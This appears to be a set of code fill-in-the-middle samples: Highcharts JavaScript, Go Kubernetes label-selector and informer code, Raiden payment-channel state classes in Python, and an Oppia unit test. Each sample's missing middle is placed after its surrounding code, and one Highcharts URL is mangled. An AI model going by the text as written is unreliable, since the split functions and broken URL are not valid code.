E(this.series.options.point,this.options).events,b;this.events=a;for(b in a)N(this,b,a[b]);this.hasImportedEvents=!0}},setState:function(a,b){var c=this.plotX,d=this.plotY,e=this.series,f=e.options.states,g=za[e.type].marker&&e.options.marker,h=g&&!g.enabled,k=g&&g.states[a],l=k&&!1===k.enabled,m=e.stateMarkerGraphic,n=this.marker||{},q=e.chart,p=e.halo,r;a=a||"";r=this.pointAttr[a]||e.pointAttr[a];if(!(a===this.state&&!b||this.selected&&"select"!==a||f[a]&&!1===f[a].enabled||a&&(l||h&&!1===k.enabled)||
a&&n.states&&n.states[a]&&!1===n.states[a].enabled)){if(this.graphic)g=g&&this.graphic.symbolName&&r.r,this.graphic.attr(E(r,g?{x:c-g,y:d-g,width:2*g,height:2*g}:{})),m&&m.hide();else{if(a&&k)if(g=k.radius,n=n.symbol||e.symbol,m&&m.currentSymbol!==n&&(m=m.destroy()),m)m[b?"animate":"attr"]({x:c-g,y:d-g});else n&&(e.stateMarkerGraphic=m=q.renderer.symbol(n,c-g,d-g,2*g,2*g).attr(r).add(e.markerGroup),m.currentSymbol=n);if(m)m[a&&q.isInsidePlot(c,d,q.inverted)?"show":"hide"]()}(c=f[a]&&f[a].halo)&&c.size?
(p||(e.halo=p=q.renderer.path().add(e.seriesGroup)),p.attr(t({fill:Aa(this.color||e.color).setOpacity(c.opacity).get()},c.attributes))[b?"animate":"attr"]({d:this.haloPath(c.size)})):p&&p.attr({d:[]});this.state=a}},haloPath:function(a){var b=this.series,c=b.chart,d=b.getPlotBox(),e=c.inverted;return c.renderer.symbols.circle(d.translateX+(e?b.yAxis.len-this.plotY:this.plotX)-a,d.translateY+(e?b.xAxis.len-this.plotX:this.plotY)-a,2*a,2*a)}});t(ga.prototype,{onMouseOver:function(){var a=this.chart,
b=a.hoverSeries;if(b&&b!==this)b.onMouseOut();this.options.events.mouseOver&&C(this,"mouseOver");this.setState("hover");a.hoverSeries=this},onMouseOut:function(){var a=this.options,b=this.chart,c=b.tooltip,d=b.hoverPoint;if(d)d.onMouseOut();this&&a.events.mouseOut&&C(this,"mouseOut");!c||a.stickyTracking||c.shared&&!this.noSharedTooltip||c.hide();this.setState();b.hoverSeries=null},setState:function(a){var b=this.options,c=this.graph,d=this.graphNeg,e=b.states,b=b.lineWidth;a=a||"";this.state!==a&&
(this.state=a,e[a]&&!1===e[a].enabled||(a&&(b=e[a].lineWidth||b+1),c&&!c.dashstyle&&(a={"stroke-width":b},c.attr(a),d&&d.attr(a))))},setVisible:function(a,b){var c=this,d=c.chart,e=c.legendItem,f,g=d.options.chart.ignoreHiddenSeries,h=c.visible;f=(c.visible=a=c.userOptions.visible=a===v?!h:a)?"show":"hide";s(["group","dataLabelsGroup","markerGroup","tracker"],function(a){if(c[a])c[a][f]()});if(d.hoverSeries===c)c.onMouseOut();e&&d.legend.colorizeItem(c,a);c.isDirty=!0;c.options.stacking&&s(d.series,
function(a){a.options.stacking&&a.visible&&(a.isDirty=!0)});s(c.linkedSeries,function(b){b.setVisible(a,!1)});g&&(d.isDirtyBox=!0);!1!==b&&d.redraw();C(c,f)},setTooltipPoints:function(a){var b=[],c,d,e=this.xAxis,f=e&&e.getExtremes(),g=e?e.tooltipLen||e.len:this.chart.plotSizeX,h,k,l=[];if(!1!==this.options.enableMouseTracking&&!this.singularTooltips){a&&(this.tooltipPoints=null);s(this.segments||this.points,function(a){b=b.concat(a)});e&&e.reversed&&(b=b.reverse());this.orderTooltipPoints&&this.orderTooltipPoints(b);
a=b.length;for(k=0;k<a;k++)if(e=b[k],c=e.x,c>=f.min&&c<=f.max)for(h=b[k+1],c=d===v?0:d+1,d=b[k+1]?J(x(0,F((e.clientX+(h?h.wrappedClientX||h.clientX:g))/2)),g):g;0<=c&&c<=d;)l[c++]=e;this.tooltipPoints=l}},show:function(){this.setVisible(!0)},hide:function(){this.setVisible(!1)},select:function(a){this.selected=a=a===v?!this.selected:a;this.checkbox&&(this.checkbox.checked=a);C(this,a?"select":"unselect")},drawTracker:ab.drawTrackerGraph});t(S,{Axis:sa,Chart:Qa,Color:Aa,Point:Ja,Tick:xa,Renderer:Ta,
Series:ga,SVGElement:W,SVGRenderer:Za,arrayMin:va,arrayMax:la,charts:Y,dateFormat:Ka,format:ua,pathAnim:lb,getOptions:function(){return I},hasBidiBug:Kb,isTouchDevice:Cb,numberFormat:qa,seriesTypes:M,setOptions:function(a){I=E(!0,I,a);ub();return I},addEvent:N,removeEvent:T,createElement:ta,discardElement:La,css:X,each:s,extend:t,map:Xa,merge:E,pick:r,splat:ha,extendClass:bb,pInt:A,wrap:cb,svg:ba,canvas:da,vml:!ba&&!da,product:"@product.name@",version:"@product.version@"})})();
(function(t){function E(){return!!this.points.length}function A(){this.hasData()?this.hideNoData():this.showNoData()}var U=t.seriesTypes,V=t.Chart.prototype,ka=t.getOptions(),$=t.extend;$(ka.lang,{noData:"No data to display"});ka.noData={position:{x:0,y:0,align:"center",verticalAlign:"middle"},attr:{},style:{fontWeight:"bold",fontSize:"12px",color:"#60606a"}};U.pie&&(U.pie.prototype.hasData=E);U.gauge&&(U.gauge.prototype.hasData=E);U.waterfall&&(U.waterfall.prototype.hasData=E);t.Series.prototype.hasData=
function(){return void 0!==this.dataMax&&void 0!==this.dataMin};V.showNoData=function(t){var A=this.options;t=t||A.lang.noData;A=A.noData;this.noDataLabel||(this.noDataLabel=this.renderer.label(t,0,0,null,null,null,null,null,"no-data").attr(A.attr).css(A.style).add(),this.noDataLabel.align($(this.noDataLabel.getBBox(),A.position),!1,"plotBox"))};V.hideNoData=function(){this.noDataLabel&&(this.noDataLabel=this.noDataLabel.destroy())};V.hasData=function(){for(var t=this.series,A=t.length;A--;)if(t[A].hasData()&&
!t[A].options.isInternal)return!0;return!1};V.callbacks.push(function(E){t.addEvent(E,"load",A);t.addEvent(E,"redraw",A)})})(Highcharts);
|
shortMonths:"Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(" "),weekdays:"Sunday Monday Tuesday Wednesday Thursday Friday Saturday".split(" "),decimalPoint:".",numericSymbols:"kMGTPE".split(""),resetZoom:"Reset zoom",resetZoomTitle:"Reset zoom level 1:1",thousandsSep:","},global:{useUTC:!0,canvasToolsURL:"http://[email protected]@/@product.version@/modules/canvas-tools.js",VMLRadialGradientURL:"http://[email protected]@/@product.version@/gfx/vml-radial-gradient.png"},
chart:{borderColor:"#4572A7",borderRadius:0,defaultSeriesType:"line",ignoreHiddenSeries:!0,spacing:[10,10,15,10],backgroundColor:"#FFFFFF",plotBorderColor:"#C0C0C0",resetZoomButton:{theme:{zIndex:20},position:{align:"right",x:-10,y:10}}},title:{text:"Chart title",align:"center",margin:15,style:{color:"#333333",fontSize:"18px"}},subtitle:{text:"",align:"center",style:{color:"#555555"}},plotOptions:{line:{allowPointSelect:!1,showCheckbox:!1,animation:{duration:1E3},events:{},lineWidth:2,marker:{lineWidth:0,
radius:4,lineColor:"#FFFFFF",states:{hover:{enabled:!0},select:{fillColor:"#FFFFFF",lineColor:"#000000",lineWidth:2}}},point:{events:{}},dataLabels:E(nb,{align:"center",enabled:!1,formatter:function(){return null===this.y?"":qa(this.y,-1)},verticalAlign:"bottom",y:0}),cropThreshold:300,pointRange:0,states:{hover:{marker:{},halo:{size:10,opacity:0.25}},select:{marker:{}}},stickyTracking:!0,turboThreshold:1E3}},labels:{style:{position:"absolute",color:"#3E576F"}},legend:{enabled:!0,align:"center",layout:"horizontal",
labelFormatter:function(){return this.name},borderColor:"#909090",borderRadius:0,navigation:{activeColor:"#274b6d",inactiveColor:"#CCC"},shadow:!1,itemStyle:{color:"#333333",fontSize:"12px",fontWeight:"bold"},itemHoverStyle:{color:"#000"},itemHiddenStyle:{color:"#CCC"},itemCheckboxStyle:{position:"absolute",width:"13px",height:"13px"},symbolPadding:5,verticalAlign:"bottom",x:0,y:0,title:{style:{fontWeight:"bold"}}},loading:{labelStyle:{fontWeight:"bold",position:"relative",top:"1em"},style:{position:"absolute",
|
parseSelector.go
|
package npm
import (
	"container/heap"
	"fmt"
	"sort"

	"github.com/Azure/azure-container-networking/log"
	"github.com/Azure/azure-container-networking/npm/util"
	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
)
// A ReqHeap is a min-heap of metav1.LabelSelectorRequirement values.
type ReqHeap []metav1.LabelSelectorRequirement
func (h ReqHeap) Len() int {
return len(h)
}
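// Less orders requirements by the first byte of Key, then by presence of
// Values, then by the first byte of the first value; note that it also sorts
// each requirement's Values in place as a side effect, which keeps the heap
// output deterministic for hashing below.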
func (h ReqHeap) Less(i, j int) bool {
sort.Strings(h[i].Values)
sort.Strings(h[j].Values)
if int(h[i].Key[0]) < int(h[j].Key[0]) {
return true
}
if int(h[i].Key[0]) > int(h[j].Key[0]) {
return false
}
if len(h[i].Values) == 0 {
return true
}
if len(h[j].Values) == 0 {
return false
}
if len(h[i].Values[0]) == 0 {
return true
}
if len(h[j].Values[0]) == 0 {
return false
}
return int(h[i].Values[0][0]) < int(h[j].Values[0][0])
}
func (h ReqHeap) Swap(i, j int) {
h[i], h[j] = h[j], h[i]
}
func (h *ReqHeap) Push(x interface{}) {
sort.Strings(x.(metav1.LabelSelectorRequirement).Values)
*h = append(*h, x.(metav1.LabelSelectorRequirement))
}
func (h *ReqHeap) Pop() interface{} {
	old := *h
	n := len(old)
	x := old[n-1]
	*h = old[0 : n-1]
	return x
}
// ParseLabel takes an Azure-NPM-processed label and reports whether it refers
// to a complement set; if so, it also returns the original label.
func ParseLabel(label string) (string, bool) {
	// The input label is guaranteed to have a non-zero length, validated by k8s.
	// For the label definition, see the parseSelector() function below.
if label[0:1] == util.IptablesNotFlag {
return label[1:], true
}
return label, false
}
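// Example (assuming util.IptablesNotFlag is "!"): ParseLabel("!app:frontend")
// returns ("app:frontend", true), while ParseLabel("app:frontend") returns
// ("app:frontend", false).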
// GetOperatorAndLabel returns the operator associated with the label and the label without operator.
func GetOperatorAndLabel(label string) (string, string) {
if len(label) == 0 {
return "", ""
}
if string(label[0]) == util.IptablesNotFlag {
return util.IptablesNotFlag, label[1:]
}
return "", label
}
// GetOperatorsAndLabels returns the operators along with the associated labels.
func GetOperatorsAndLabels(labelsWithOps []string) ([]string, []string) {
var ops, labelsWithoutOps []string
for _, labelWithOp := range labelsWithOps {
op, labelWithoutOp := GetOperatorAndLabel(labelWithOp)
ops = append(ops, op)
labelsWithoutOps = append(labelsWithoutOps, labelWithoutOp)
}
return ops, labelsWithoutOps
}
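// Example (assuming util.IptablesNotFlag is "!"):
// GetOperatorsAndLabels([]string{"app:frontend", "!env:prod"}) returns
// ops []string{"", "!"} and labels []string{"app:frontend", "env:prod"}.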
// sortSelector sorts the member fields of the selector in alphabetical order.
func sortSelector(selector *metav1.LabelSelector) {
_, _ = util.SortMap(&selector.MatchLabels)
reqHeap := &ReqHeap{}
heap.Init(reqHeap)
for _, req := range selector.MatchExpressions {
heap.Push(reqHeap, req)
}
var sortedReqs []metav1.LabelSelectorRequirement
for reqHeap.Len() > 0 {
sortedReqs = append(sortedReqs, heap.Pop(reqHeap).(metav1.LabelSelectorRequirement))
}
selector.MatchExpressions = sortedReqs
}
// HashSelector returns the hash value of the selector.
func HashSelector(selector *metav1.LabelSelector) string {
sortSelector(selector)
return util.Hash(fmt.Sprintf("%v", selector))
}
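// HashSelector is deterministic across equivalent selectors because
// sortSelector canonicalizes the field order before hashing.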
// parseSelector takes a LabelSelector and returns a slice of processed labels, keys and values.
func parseSelector(selector *metav1.LabelSelector) ([]string, []string, []string)
|
{
var (
labels []string
keys []string
vals []string
)
if selector == nil {
return labels, keys, vals
}
if len(selector.MatchLabels) == 0 && len(selector.MatchExpressions) == 0 {
labels = append(labels, "")
keys = append(keys, "")
vals = append(vals, "")
return labels, keys, vals
}
sortedKeys, sortedVals := util.SortMap(&selector.MatchLabels)
for i := range sortedKeys {
labels = append(labels, sortedKeys[i]+":"+sortedVals[i])
}
keys = append(keys, sortedKeys...)
vals = append(vals, sortedVals...)
for _, req := range selector.MatchExpressions {
var k string
switch op := req.Operator; op {
case metav1.LabelSelectorOpIn:
for _, v := range req.Values {
k = req.Key
keys = append(keys, k)
vals = append(vals, v)
labels = append(labels, k+":"+v)
}
case metav1.LabelSelectorOpNotIn:
for _, v := range req.Values {
k = util.IptablesNotFlag + req.Key
keys = append(keys, k)
vals = append(vals, v)
labels = append(labels, k+":"+v)
}
// Exists matches pods with req.Key as key
case metav1.LabelSelectorOpExists:
k = req.Key
keys = append(keys, req.Key)
vals = append(vals, "")
labels = append(labels, k)
// DoesNotExist matches pods without req.Key as key
case metav1.LabelSelectorOpDoesNotExist:
k = util.IptablesNotFlag + req.Key
keys = append(keys, k)
vals = append(vals, "")
labels = append(labels, k)
default:
log.Errorf("Invalid operator [%s] for selector [%v] requirement", op, *selector)
}
}
return labels, keys, vals
}
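// Example (assuming util.IptablesNotFlag is "!"): a selector with MatchLabels
// {"app": "frontend"} plus a NotIn requirement {Key: "env", Values: ["prod"]}
// yields labels ["app:frontend", "!env:prod"], keys ["app", "!env"] and
// vals ["frontend", "prod"].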
|
|
machine.go
|
/*
Copyright The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// Code generated by informer-gen. DO NOT EDIT.
package v1
import (
"context"
time "time"
crdv1 "github.com/kangxiaoning/learn-kubernetes-crd/pkg/apis/crd/v1"
versioned "github.com/kangxiaoning/learn-kubernetes-crd/pkg/client/clientset/versioned"
internalinterfaces "github.com/kangxiaoning/learn-kubernetes-crd/pkg/client/informers/externalversions/internalinterfaces"
v1 "github.com/kangxiaoning/learn-kubernetes-crd/pkg/client/listers/crd/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
runtime "k8s.io/apimachinery/pkg/runtime"
watch "k8s.io/apimachinery/pkg/watch"
cache "k8s.io/client-go/tools/cache"
)
// MachineInformer provides access to a shared informer and lister for
// Machines.
type MachineInformer interface {
Informer() cache.SharedIndexInformer
Lister() v1.MachineLister
}
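// A typical way to obtain this informer is through the generated shared
// factory (sketch only; the exact accessor chain depends on the generated
// externalversions package):
//
//	factory := externalversions.NewSharedInformerFactory(client, 10*time.Minute)
//	machines := factory.Crd().V1().Machines()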
type machineInformer struct {
factory internalinterfaces.SharedInformerFactory
tweakListOptions internalinterfaces.TweakListOptionsFunc
namespace string
}
// NewMachineInformer constructs a new informer for Machine type.
// Always prefer using an informer factory to get a shared informer instead of getting an independent
// one. This reduces memory footprint and number of connections to the server.
func NewMachineInformer(client versioned.Interface, namespace string, resyncPeriod time.Duration, indexers cache.Indexers) cache.SharedIndexInformer {
return NewFilteredMachineInformer(client, namespace, resyncPeriod, indexers, nil)
}
// NewFilteredMachineInformer constructs a new informer for Machine type.
// Always prefer using an informer factory to get a shared informer instead of getting an independent
// one. This reduces memory footprint and number of connections to the server.
func
|
(client versioned.Interface, namespace string, resyncPeriod time.Duration, indexers cache.Indexers, tweakListOptions internalinterfaces.TweakListOptionsFunc) cache.SharedIndexInformer {
return cache.NewSharedIndexInformer(
&cache.ListWatch{
ListFunc: func(options metav1.ListOptions) (runtime.Object, error) {
if tweakListOptions != nil {
tweakListOptions(&options)
}
return client.CrdV1().Machines(namespace).List(context.TODO(), options)
},
WatchFunc: func(options metav1.ListOptions) (watch.Interface, error) {
if tweakListOptions != nil {
tweakListOptions(&options)
}
return client.CrdV1().Machines(namespace).Watch(context.TODO(), options)
},
},
&crdv1.Machine{},
resyncPeriod,
indexers,
)
}
func (f *machineInformer) defaultInformer(client versioned.Interface, resyncPeriod time.Duration) cache.SharedIndexInformer {
return NewFilteredMachineInformer(client, f.namespace, resyncPeriod, cache.Indexers{cache.NamespaceIndex: cache.MetaNamespaceIndexFunc}, f.tweakListOptions)
}
func (f *machineInformer) Informer() cache.SharedIndexInformer {
return f.factory.InformerFor(&crdv1.Machine{}, f.defaultInformer)
}
func (f *machineInformer) Lister() v1.MachineLister {
return v1.NewMachineLister(f.Informer().GetIndexer())
}
|
NewFilteredMachineInformer
|
state_change.py
|
# -*- coding: utf-8 -*-
# pylint: disable=too-few-public-methods,too-many-arguments,too-many-instance-attributes
from raiden.transfer.architecture import StateChange
from raiden.transfer.state import RouteState
from raiden.transfer.mediated_transfer.state import (
LockedTransferSignedState,
TransferDescriptionWithSecretState,
)
from raiden.utils import pex, sha3, typing
# Note: The init state changes must contain all the data required to attempt
# useful work, i.e. there must /not/ be an event for requesting new data.
class ActionInitInitiator(StateChange):
""" Initial state of a new mediated transfer.
Args:
transfer: A state object containing the transfer details.
routes: A list of possible routes provided by a routing service.
secret: The secret that must be used with the transfer.
"""
def __init__(self, payment_network_identifier, transfer_description, routes):
if not isinstance(transfer_description, TransferDescriptionWithSecretState):
            raise ValueError('transfer must be a TransferDescriptionWithSecretState instance.')
self.payment_network_identifier = payment_network_identifier
self.transfer = transfer_description
self.routes = routes
def __repr__(self):
return '<ActionInitInitiator network:{} transfer:{}>'.format(
self.payment_network_identifier,
self.transfer,
)
def __eq__(self, other):
return (
isinstance(other, ActionInitInitiator) and
self.payment_network_identifier == other.payment_network_identifier and
self.transfer == other.transfer and
self.routes == other.routes
)
def __ne__(self, other):
return not self.__eq__(other)
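# A minimal construction sketch (variable names below are illustrative, not
# defined in this module):
#
#     init = ActionInitInitiator(
#         payment_network_identifier,
#         transfer_description,  # a TransferDescriptionWithSecretState
#         routes,                # list of candidate RouteState objects
#     )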
class ActionInitMediator(StateChange):
""" Initial state for a new mediator.
Args:
routes: A list of possible routes provided by a routing service.
        from_route: The payer route.
        from_transfer: The payer transfer.
"""
def __init__(
self,
payment_network_identifier,
routes: typing.List[RouteState],
from_route: RouteState,
from_transfer: LockedTransferSignedState):
if not isinstance(from_route, RouteState):
raise ValueError('from_route must be a RouteState instance')
if not isinstance(from_transfer, LockedTransferSignedState):
raise ValueError('from_transfer must be a LockedTransferSignedState instance')
self.payment_network_identifier = payment_network_identifier
self.routes = routes
self.from_route = from_route
self.from_transfer = from_transfer
def __repr__(self):
return '<ActionInitMediator network:{} from_route:{} from_transfer:{}>'.format(
self.payment_network_identifier,
self.from_route,
self.from_transfer,
)
def __eq__(self, other):
return (
isinstance(other, ActionInitMediator) and
self.payment_network_identifier == other.payment_network_identifier and
self.routes == other.routes and
self.from_route == other.from_route and
self.from_transfer == other.from_transfer
)
def __ne__(self, other):
return not self.__eq__(other)
class ActionInitTarget(StateChange):
""" Initial state for a new target.
Args:
        route: The payer route.
        transfer: The payer transfer.
"""
def __init__(self, payment_network_identifier, route, transfer):
if not isinstance(route, RouteState):
raise ValueError('route must be a RouteState instance')
if not isinstance(transfer, LockedTransferSignedState):
raise ValueError('transfer must be a LockedTransferSignedState instance')
self.payment_network_identifier = payment_network_identifier
self.route = route
self.transfer = transfer
def __repr__(self):
return '<ActionInitTarget network:{} route:{} transfer:{}>'.format(
self.payment_network_identifier,
self.route,
self.transfer,
)
def __eq__(self, other):
return (
isinstance(other, ActionInitTarget) and
self.payment_network_identifier == other.payment_network_identifier and
self.route == other.route and
self.transfer == other.transfer
)
def __ne__(self, other):
return not self.__eq__(other)
class ActionCancelRoute(StateChange):
""" Cancel the current route.
Notes:
Used to cancel a specific route but not the transfer. May be used for
timeouts.
"""
def __init__(self, identifier, routes):
self.identifier = identifier
self.routes = routes
def __repr__(self):
return '<ActionCancelRoute id:{}>'.format(
self.identifier,
)
def __eq__(self, other):
return (
isinstance(other, ActionCancelRoute) and
self.identifier == other.identifier and
self.routes == other.routes
)
def __ne__(self, other):
return not self.__eq__(other)
class ReceiveSecretRequest(StateChange):
""" A SecretRequest message received. """
def __init__(self, identifier, amount, hashlock, sender):
self.identifier = identifier
self.amount = amount
self.hashlock = hashlock
self.sender = sender
self.revealsecret = None
def __repr__(self):
return '<ReceiveSecretRequest id:{} amount:{} hashlock:{} sender:{}>'.format(
self.identifier,
self.amount,
pex(self.hashlock),
pex(self.sender),
)
def __eq__(self, other):
return (
isinstance(other, ReceiveSecretRequest) and
self.identifier == other.identifier and
self.amount == other.amount and
self.hashlock == other.hashlock and
self.sender == other.sender and
self.revealsecret == other.revealsecret
)
def __ne__(self, other):
return not self.__eq__(other)
class ReceiveSecretReveal(StateChange):
""" A SecretReveal message received. """
def __init__(self, secret, sender):
hashlock = sha3(secret)
self.secret = secret
self.hashlock = hashlock
self.sender = sender
def __repr__(self):
return '<ReceiveSecretReveal hashlock:{} sender:{}>'.format(
pex(self.hashlock),
pex(self.sender),
)
def __eq__(self, other):
return (
isinstance(other, ReceiveSecretReveal) and
self.secret == other.secret and
self.hashlock == other.hashlock and
self.sender == other.sender
)
def __ne__(self, other):
return not self.__eq__(other)
class ReceiveTransferRefundCancelRoute(StateChange):
""" A RefundTransfer message received by initiator will cancel the current
route.
"""
def __init__(self, sender, routes, transfer, secret):
if not isinstance(transfer, LockedTransferSignedState):
raise ValueError('transfer must be an instance of LockedTransferSignedState')
hashlock = sha3(secret)
self.sender = sender
self.transfer = transfer
self.routes = routes
self.hashlock = hashlock
self.secret = secret
def __repr__(self):
return '<ReceiveTransferRefundCancelRoute sender:{} transfer:{}>'.format(
pex(self.sender),
self.transfer
)
def __eq__(self, other):
return (
isinstance(other, ReceiveTransferRefundCancelRoute) and
self.sender == other.sender and
self.transfer == other.transfer and
self.routes == other.routes and
self.secret == other.secret and
self.hashlock == other.hashlock
)
def __ne__(self, other):
return not self.__eq__(other)
class ReceiveTransferRefund(StateChange):
""" A RefundTransfer message received. """
def __init__(self, sender, transfer: LockedTransferSignedState):
if not isinstance(transfer, LockedTransferSignedState):
raise ValueError('transfer must be an instance of LockedTransferSignedState')
self.sender = sender
self.transfer = transfer
def __repr__(self):
return '<ReceiveTransferRefund sender:{} transfer:{}>'.format(
pex(self.sender),
self.transfer,
)
def __eq__(self, other):
return (
isinstance(other, ReceiveTransferRefund) and
self.sender == other.sender and
self.transfer == other.transfer
)
def __ne__(self, other):
return not self.__eq__(other)
class ReceiveBalanceProof(StateChange):
""" A balance proof `identifier` was received. """
def __init__(self, identifier, node_address, balance_proof):
self.identifier = identifier
self.node_address = node_address
self.balance_proof = balance_proof
def __repr__(self):
return '<ReceiveBalanceProof id:{} node:{} balance_proof:{}>'.format(
self.identifier,
pex(self.node_address),
self.balance_proof,
)
def __eq__(self, other):
return (
isinstance(other, ReceiveBalanceProof) and
self.identifier == other.identifier and
self.node_address == other.node_address and
self.balance_proof == other.balance_proof
)
def __ne__(self, other):
return not self.__eq__(other)
class ContractReceiveWithdraw(StateChange):
""" A lock was withdrawn via the blockchain.
Used when a hash time lock was withdrawn and a log ChannelSecretRevealed is
    emitted by the netting channel.
Note:
        For this state change the contract caller is not important; only the
        receiving address matters. `receiver` is the address to which the
        lock's token was transferred, and it may be either of the channel
        participants.
If the channel was used for a mediated transfer that was refunded, this
event must be used twice, once for each receiver.
"""
def __init__(self, channel_address, secret, receiver):
hashlock = sha3(secret)
self.channel_address = channel_address
self.hashlock = hashlock
self.receiver = receiver
self.secret = secret
def __repr__(self):
return '<ContractReceiveWithdraw channel:{} hashlock:{} receiver:{}>'.format(
pex(self.channel_address),
pex(self.hashlock),
pex(self.receiver),
)
def __eq__(self, other):
return (
isinstance(other, ContractReceiveWithdraw) and
self.channel_address == other.channel_address and
self.hashlock == other.hashlock and
self.receiver == other.receiver and
self.secret == other.secret
)
def __ne__(self, other):
return not self.__eq__(other)
class ContractReceiveClosed(StateChange):
def __init__(self, channel_address, closing_address, block_number):
self.channel_address = channel_address
self.closing_address = closing_address
self.block_number = block_number # TODO: rename to closed_block
def __repr__(self):
return '<ContractReceiveClosed channel:{} closing:{} block_number:{}>'.format(
pex(self.channel_address),
pex(self.closing_address),
self.block_number,
)
def __eq__(self, other):
return (
isinstance(other, ContractReceiveClosed) and
self.channel_address == other.channel_address and
self.closing_address == other.closing_address and
self.block_number == other.block_number
)
def __ne__(self, other):
return not self.__eq__(other)
class ContractReceiveSettled(StateChange):
def __init__(self, channel_address, block_number):
self.channel_address = channel_address
self.block_number = block_number # TODO: rename to settle_block_number
def
|
(self):
return '<ContractReceiveSettled channel:{} block_number:{}>'.format(
pex(self.channel_address),
self.block_number,
)
def __eq__(self, other):
return (
isinstance(other, ContractReceiveSettled) and
self.channel_address == other.channel_address and
self.block_number == other.block_number
)
def __ne__(self, other):
return not self.__eq__(other)
class ContractReceiveBalance(StateChange):
def __init__(
self,
channel_address,
token_address,
participant_address,
balance,
block_number):
self.channel_address = channel_address
self.token_address = token_address
self.participant_address = participant_address
self.balance = balance
self.block_number = block_number
def __repr__(self):
return (
'<ContractReceiveBalance'
' channel:{} token:{} participant:{} balance:{} block_number:{}'
'>'
).format(
pex(self.channel_address),
pex(self.token_address),
pex(self.participant_address),
self.balance,
self.block_number,
)
    def __eq__(self, other):
        return (
            isinstance(other, ContractReceiveBalance) and
            self.channel_address == other.channel_address and
            self.token_address == other.token_address and
            self.participant_address == other.participant_address and
            self.balance == other.balance and
            self.block_number == other.block_number
        )
def __ne__(self, other):
return not self.__eq__(other)
class ContractReceiveNewChannel(StateChange):
def __init__(
self,
manager_address,
channel_address,
participant1,
participant2,
settle_timeout):
self.manager_address = manager_address
self.channel_address = channel_address
self.participant1 = participant1
self.participant2 = participant2
self.settle_timeout = settle_timeout
def __repr__(self):
return (
'<ContractReceiveNewChannel'
' manager:{} channel:{} participant1:{} participant2:{} settle_timeout:{}'
'>'
).format(
pex(self.manager_address),
pex(self.channel_address),
pex(self.participant1),
pex(self.participant2),
self.settle_timeout
)
def __eq__(self, other):
return (
isinstance(other, ContractReceiveNewChannel) and
self.manager_address == other.manager_address and
self.channel_address == other.channel_address and
self.participant1 == other.participant1 and
self.participant2 == other.participant2 and
self.settle_timeout == other.settle_timeout
)
def __ne__(self, other):
return not self.__eq__(other)
class ContractReceiveTokenAdded(StateChange):
def __init__(self, registry_address, token_address, manager_address):
self.registry_address = registry_address
self.token_address = token_address
self.manager_address = manager_address
def __repr__(self):
return '<ContractReceiveTokenAdded registry:{} token:{} manager:{}>'.format(
pex(self.registry_address),
pex(self.token_address),
pex(self.manager_address),
)
def __eq__(self, other):
return (
isinstance(other, ContractReceiveTokenAdded) and
self.registry_address == other.registry_address and
self.token_address == other.token_address and
self.manager_address == other.manager_address
)
def __ne__(self, other):
return not self.__eq__(other)
|
__repr__
|
NeedsGuidingResponsesTaskObjectFactorySpec.ts
|
// Copyright 2020 The Oppia Authors. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS-IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
/**
* @fileoverview Unit tests for the NeedsGuidingResponsesTask domain object.
*/
import { TestBed } from '@angular/core/testing';
import { NeedsGuidingResponsesTaskObjectFactory } from
'domain/improvements/NeedsGuidingResponsesTaskObjectFactory';
import { AnswerStats } from 'domain/exploration/AnswerStatsObjectFactory';
describe('Needs guiding responses task', function() {
let needsGuidingResponsesTaskObjectFactory:
NeedsGuidingResponsesTaskObjectFactory;
beforeEach(() => {
needsGuidingResponsesTaskObjectFactory = (
TestBed.get(NeedsGuidingResponsesTaskObjectFactory));
});
beforeEach(() => {
this.newTop10AnswerStats = (numUnaddressedAnswers: number) => {
const answerStats = [];
for (let i = 0; i < 10; ++i) {
const newAnswerStats = new AnswerStats(
`Answer #${i}`, `Answer #${i}`, (10 - i) * 100,
i >= numUnaddressedAnswers);
answerStats.push(newAnswerStats);
}
return answerStats;
};
});
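  // newTop10AnswerStats builds 10 answers with strictly descending
  // frequencies; the first `numUnaddressedAnswers` of them are created with
  // the fourth AnswerStats argument false, i.e. answers still lacking
  // explicit feedback.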
it('should return new task if state answer needs a guiding response', () => {
const task = needsGuidingResponsesTaskObjectFactory.createFromAnswerStats(
'eid', 1, 'Introduction', this.newTop10AnswerStats(3));
expect(task.entityType).toEqual('exploration');
expect(task.entityId).toEqual('eid');
expect(task.entityVersion).toEqual(1);
expect(task.taskType).toEqual('needs_guiding_responses');
expect(task.targetType).toEqual('state');
expect(task.targetId).toEqual('Introduction');
expect(task.getIssueDescription()).toEqual(
'3 of the top 10 answers for this card did not have explicit feedback ' +
'from Oppia.');
expect(task.isOpen()).toBeTrue();
});
it('should return obsolete task if all answers are addressed', () => {
const task = needsGuidingResponsesTaskObjectFactory.createFromAnswerStats(
'eid', 1, 'Introduction', this.newTop10AnswerStats(0));
expect(task.entityType).toEqual('exploration');
expect(task.entityId).toEqual('eid');
expect(task.entityVersion).toEqual(1);
expect(task.taskType).toEqual('needs_guiding_responses');
expect(task.targetType).toEqual('state');
expect(task.targetId).toEqual('Introduction');
expect(task.getIssueDescription()).toBeNull();
expect(task.isObsolete()).toBeTrue();
});
it('should create from an NGR task backend dict', () => {
const task = needsGuidingResponsesTaskObjectFactory.createFromBackendDict({
entity_type: 'exploration',
entity_id: 'eid',
entity_version: 1,
task_type: 'needs_guiding_responses',
target_type: 'state',
target_id: 'Introduction',
issue_description: (
'3 of the top 10 answers for this card did not have explicit ' +
'feedback from Oppia.'),
status: 'open',
resolver_username: null,
resolver_profile_picture_data_url: null,
resolved_on_msecs: null,
});
expect(task.entityType).toEqual('exploration');
expect(task.entityId).toEqual('eid');
expect(task.entityVersion).toEqual(1);
